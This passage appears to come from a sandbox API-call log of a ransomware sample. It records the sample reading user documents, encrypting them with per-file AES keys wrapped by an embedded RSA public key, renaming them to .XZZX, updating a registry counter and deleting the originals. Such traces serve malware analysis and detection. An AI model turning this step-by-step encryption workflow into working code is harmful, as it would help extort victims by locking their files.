pguid=0x417e440*(Data1=0x8fd30db7, Data2=0x957e, Data3=0x45fc, Data4=([0]=0xa7, [1]=0xd2, [2]=0xdb, [3]=0x47, [4]=0xb2, [5]=0x4c, [6]=0x94, [7]=0x69))) returned 0x0 [0040.088] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\NMqv0Yc9MO55X.xls") returned 82 [0040.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0040.089] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\A0DC431228DE1E088FD30DB72CF60250.XZZX") returned 102 [0040.089] StrStrW (lpFirst="NMqv0Yc9MO55X.xls", lpSrch="XZZX") returned 0x0 [0040.089] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\NMqv0Yc9MO55X.xls", dwFileAttributes=0x20) returned 1 [0040.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\NMqv0Yc9MO55X.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\nmqv0yc9mo55x.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0040.089] ReadFile (in: hFile=0x478, lpBuffer=0x42da780, nNumberOfBytesToRead=0x818b, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42da780*, lpNumberOfBytesRead=0x417e418*=0x818b, lpOverlapped=0x0) returned 1 [0040.090] CloseHandle (hObject=0x478) returned 1 [0040.090] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0040.090] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0040.091] SetErrorMode (uMode=0x1) returned 0x1 [0040.091] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0040.091] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2dec8) returned 1 [0040.093] CryptGenKey (in: hProv=0x3e2dec8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5210) returned 1 [0040.615] CryptExportKey (in: hKey=0x42e5210, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0040.615] CryptExportKey (in: hKey=0x42e5210, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0040.615] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0040.616] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0040.616] CryptDestroyKey (hKey=0x42e5210) returned 1 [0040.616] CryptReleaseContext (hProv=0x3e2e0e8, dwFlags=0x0) returned 0 [0040.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\A0DC431228DE1E088FD30DB72CF60250.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\a0dc431228de1e088fd30db72cf60250.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0040.617] WriteFile (in: hFile=0x4a8, lpBuffer=0x42da780*, nNumberOfBytesToWrite=0x818b, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42da780*, lpNumberOfBytesWritten=0x417e438*=0x818b, lpOverlapped=0x0) returned 1 [0040.618] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x818b [0040.618] WriteFile (in: hFile=0x4a8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0040.618] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8190 [0040.618] WriteFile (in: hFile=0x4a8, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x22, lpOverlapped=0x0) returned 1 [0040.618] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x81b2 [0040.618] WriteFile (in: hFile=0x4a8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0040.618] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x81b7 [0040.619] SetErrorMode (uMode=0x1) returned 0x1 [0040.619] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0040.619] OutputDebugStringW (lpOutputString="end") [0040.619] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0040.619] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0040.619] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e2e170) returned 1 [0040.620] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2e170, dwCertEncodingType=0x1, pInfo=0x3e3ed40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3ed70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3ed78*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5210) returned 1 [0040.620] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0040.621] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0040.621] CryptEncrypt (in: hKey=0x42e5210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0040.621] CryptEncrypt (in: hKey=0x42e5210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2e1f8*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2e1f8*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0040.621] WriteFile (in: hFile=0x4a8, lpBuffer=0x3e2e1f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e2e1f8*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0040.621] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0040.621] WriteFile (in: hFile=0x4a8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0040.621] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0040.621] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0040.621] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x4b4) returned 0x0 [0040.621] RegQueryValueExW (in: hKey=0x4b4, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x24, lpcbData=0x417dfdc*=0x4) returned 0x0 [0040.621] RegCloseKey (hKey=0x4b4) returned 0x0 [0040.621] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x4b4) returned 0x0 [0040.622] RegSetValueExW (in: hKey=0x4b4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x25, cbData=0x4 | out: lpData=0x417dfec*=0x25) returned 0x0 [0040.622] RegCloseKey (hKey=0x4b4) returned 0x0 [0040.622] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.622] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.622] CloseHandle (hObject=0x4a8) returned 1 [0040.623] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0040.624] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0040.624] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\NMqv0Yc9MO55X.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\nmqv0yc9mo55x.xls")) returned 1 [0040.625] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\NMqv0Yc9MO55X.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\nmqv0yc9mo55x.xls")) returned 0 Thread: id = 131 os_tid = 0x8f4 [0040.338] lstrcpyA (in: lpString1=0x46cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0040.338] lstrcpyW (in: lpString1=0x46cf460, lpString2="QRg3dKar.odp" | out: lpString1="QRg3dKar.odp") returned="QRg3dKar.odp" [0040.338] lstrcpyW (in: lpString1=0x46ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0040.338] SetErrorMode (uMode=0x1) returned 0x1 [0040.338] lstrcpyW (in: lpString1=0x46cf860, lpString2="QRg3dKar.odp" | out: lpString1="QRg3dKar.odp") returned="QRg3dKar.odp" [0040.338] CoCreateGuid (in: pguid=0x46ce440 | out: pguid=0x46ce440*(Data1=0x1085a131, Data2=0xdf7a, Data3=0x43f8, Data4=([0]=0xab, [1]=0x2c, [2]=0x62, [3]=0xe, [4]=0x6a, [5]=0xa9, [6]=0xad, [7]=0x4b))) returned 0x0 [0040.338] wsprintfW (in: param_1=0x46cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\QRg3dKar.odp") returned 77 [0040.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x46cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0040.338] wsprintfW (in: param_1=0x46ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\4718805A3B556C301085A1313FC25078.XZZX") returned 102 [0040.338] StrStrW (lpFirst="QRg3dKar.odp", lpSrch="XZZX") returned 0x0 [0040.338] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\QRg3dKar.odp", dwFileAttributes=0x20) returned 1 [0040.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\QRg3dKar.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\qrg3dkar.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498 [0040.339] ReadFile (in: hFile=0x498, lpBuffer=0x3e45838, nNumberOfBytesToRead=0x6ef6, lpNumberOfBytesRead=0x46ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e45838*, lpNumberOfBytesRead=0x46ce418*=0x6ef6, lpOverlapped=0x0) returned 1 [0040.339] CloseHandle (hObject=0x498) returned 1 [0040.339] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3eb0000 [0040.340] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ec0000 [0040.340] SetErrorMode (uMode=0x1) returned 0x1 [0040.340] lstrcpyW (in: lpString1=0x46ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0040.340] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2e060) returned 1 [0040.342] CryptGenKey (in: hProv=0x3e2e060, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5290) returned 1 [0040.740] CryptExportKey (in: hKey=0x42e5290, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x46ce41c | out: pbData=0x0*, pdwDataLen=0x46ce41c*=0x94) returned 1 [0040.741] CryptExportKey (in: hKey=0x42e5290, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ec0000, pdwDataLen=0x46ce41c | out: pbData=0x3ec0000*, pdwDataLen=0x46ce41c*=0x94) returned 1 [0040.741] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0040.741] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0040.741] CryptDestroyKey (hKey=0x42e5290) returned 1 [0040.741] CryptReleaseContext (hProv=0x3e2e0e8, dwFlags=0x0) returned 0 [0040.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\4718805A3B556C301085A1313FC25078.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\4718805a3b556c301085a1313fc25078.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a0 [0040.742] WriteFile (in: hFile=0x4a0, lpBuffer=0x3e45838*, nNumberOfBytesToWrite=0x6ef6, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e45838*, lpNumberOfBytesWritten=0x46ce438*=0x6ef6, lpOverlapped=0x0) returned 1 [0040.743] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6ef6 [0040.743] WriteFile (in: hFile=0x4a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0040.743] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6efb [0040.743] WriteFile (in: hFile=0x4a0, lpBuffer=0x46cf860*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x46cf860*, lpNumberOfBytesWritten=0x46ce438*=0x18, lpOverlapped=0x0) returned 1 [0040.743] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6f13 [0040.743] WriteFile (in: hFile=0x4a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0040.743] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6f18 [0040.743] SetErrorMode (uMode=0x1) returned 0x1 [0040.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0040.743] OutputDebugStringW (lpOutputString="end") [0040.744] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õl\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x46cdbf4, pcbBinary=0x46cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x46cdbf4, pcbBinary=0x46cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0040.744] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x46cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x46cd3dc, pcbStructInfo=0x46cd3d8 | out: pvStructInfo=0x46cd3dc, pcbStructInfo=0x46cd3d8) returned 1 [0040.744] CryptAcquireContextW (in: phProv=0x46cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x46cd3e4*=0x3e2e280) returned 1 [0040.744] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2e280, dwCertEncodingType=0x1, pInfo=0x3dd2678*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd26a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd26b0*, PublicKey.cUnusedBits=0x0), phKey=0x46cd3ec | out: phKey=0x46cd3ec*=0x42e5290) returned 1 [0040.744] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0040.745] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0040.745] CryptEncrypt (in: hKey=0x42e5290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x46cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x46cd3f0*=0x80) returned 1 [0040.745] CryptEncrypt (in: hKey=0x42e5290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2e308*, pdwDataLen=0x46cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2e308*, pdwDataLen=0x46cd3e8*=0x80) returned 1 [0040.745] WriteFile (in: hFile=0x4a0, lpBuffer=0x3e2e308*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2e308*, lpNumberOfBytesWritten=0x46ce438*=0x80, lpOverlapped=0x0) returned 1 [0040.745] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0040.745] WriteFile (in: hFile=0x4a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0040.745] GetUserNameW (in: lpBuffer=0x46ce1f8, pcbBuffer=0x46cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x46cdfe0) returned 1 [0040.746] wsprintfW (in: param_1=0x46cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0040.746] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x46cdfe4 | out: phkResult=0x46cdfe4*=0x4a8) returned 0x0 [0040.746] RegQueryValueExW (in: hKey=0x4a8, lpValueName="E1010314", lpReserved=0x0, lpType=0x46cdfd8, lpData=0x46cdfec, lpcbData=0x46cdfdc*=0x4 | out: lpType=0x46cdfd8*=0x4, lpData=0x46cdfec*=0x25, lpcbData=0x46cdfdc*=0x4) returned 0x0 [0040.746] RegCloseKey (hKey=0x4a8) returned 0x0 [0040.746] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x46cdfe8 | out: phkResult=0x46cdfe8*=0x4a8) returned 0x0 [0040.746] RegSetValueExW (in: hKey=0x4a8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x46cdfec*=0x26, cbData=0x4 | out: lpData=0x46cdfec*=0x26) returned 0x0 [0040.746] RegCloseKey (hKey=0x4a8) returned 0x0 [0040.746] VirtualFree (lpAddress=0x3eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.746] VirtualFree (lpAddress=0x3ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.747] CloseHandle (hObject=0x4a0) returned 1 [0040.748] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0040.748] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0040.748] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\QRg3dKar.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\qrg3dkar.odp")) returned 1 [0040.749] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\QRg3dKar.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\qrg3dkar.odp")) returned 0 Thread: id = 132 os_tid = 0x60c [0040.556] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 